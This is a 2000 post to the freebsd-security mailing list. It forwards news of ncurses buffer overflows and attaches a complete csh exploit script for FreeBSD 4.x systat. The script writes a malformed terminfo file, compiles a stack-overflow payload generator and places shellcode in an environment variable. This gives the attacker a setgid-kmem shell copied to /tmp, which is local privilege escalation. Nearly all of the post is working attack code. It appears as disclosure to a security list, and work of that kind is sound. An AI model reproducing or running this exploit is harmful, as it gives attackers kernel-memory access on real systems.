Date: Tue, 10 Oct 2000 16:07:37 +0200
From: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
To: freebsd-security@freebsd.org
Subject: Re: ncurses buffer overflows (fwd)
Message-ID: <20001010160736.N94343@riget.scene.pl>
In-Reply-To: <200010101403.e9AE3Ir08713@cwsys.cwsent.com>; from Cy.Schubert@uumail.gov.bc.ca on Tue, Oct 10, 2000 at 07:02:30AM -0700
References: <200010101403.e9AE3Ir08713@cwsys.cwsent.com>
[-- Attachment #1 --]

On Tue, Oct 10, 2000 at 07:02:30AM -0700, Cy Schubert - ITSD Open Systems Group wrote:
> For those of you who don't subscribe to BUGTRAQ, here's a heads up.

And the exploit (in attachment).

-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *

[-- Attachment #2 --]

#!/bin/csh
##############################################################################
# (c) 2000 Przemysław Frasunek <venglin@freebsd.lublin.pl>                   #
#                                                                            #
# FreeBSD 4.x systat gid=kmem exploit                                        #
# Idea by: Jouko Pynnönen <jouko@SOLUTIONS.FI>                               #
#                                                                            #
# Dedicated to ksm.                                                          #
#                                                                            #
# I was bored at school, so I wrote the exploit during English class. :)     #
##############################################################################

cat << __EOF__ > /tmp/xx
#!/bin/csh
cp /bin/csh /tmp
/usr/sbin/chgrp kmem /tmp/csh
chmod 2755 /tmp/csh
__EOF__

chmod 755 /tmp/xx

cat << __EOF__ > /tmp/sploitte.c
#include <stdio.h>
#include <string.h>
#include <fcntl.h>

#define OFF -400
#define ALIGN 516

long getesp(void)
{
	__asm__("movl %esp, %eax\n");
}

int main(void)
{
	/* precompiled malformed terminfo binary */
	char evilcap[] =
	"\x1a\x01\x2a\x00\x26\x00\x21\x00\x82\x01\x09\x02\x73\x63\x72\x65"
	"\x65\x6e\x7c\x56\x54\x20\x31\x30\x30\x2f\x41\x4e\x53\x49\x20\x58"
	"\x33\x2e\x36\x34\x20\x76\x69\x72\x74\x75\x61\x6c\x20\x74\x65\x72"
	"\x6d\x69\x6e\x61\x6c";
	char retbuf[5];
	long ret = getesp() + OFF;
	int i;

	write(2, evilcap, sizeof(evilcap)-1);
	for (i=0;i<39;i++) write(2, "\0", 1);
	for (i=0;i<86;i++) write(2, "\xff", 1);
	write(2, "\0\0", 2);
	for (i=0;i<750;i++) write(2, "\xff", 1);
	for (i=0;i<ALIGN;i++) write(2, "a", 1);
	sprintf(retbuf, "%c%c%c%c", ((int)ret & 0xff), (((int)ret & 0xff00) >> 8),
	    (((int)ret & 0xff0000) >> 16), (((int)ret & 0xff000000) >> 24));
	write(2, retbuf, 5);
}
__EOF__

cc -o /tmp/s /tmp/sploitte.c
cd $HOME
mkdir -p .terminfo/s
setenv TERM screen
/tmp/s >& .terminfo/s/screen
setenv EGG `perl -e 'print "\x90" x 10000 ; print "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/xx\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"'`
/usr/bin/systat >& /dev/null
rm -f .terminfo/s/screen
ls -la /tmp/csh
rm -f /tmp/xx /tmp/s /tmp/sploitte.c
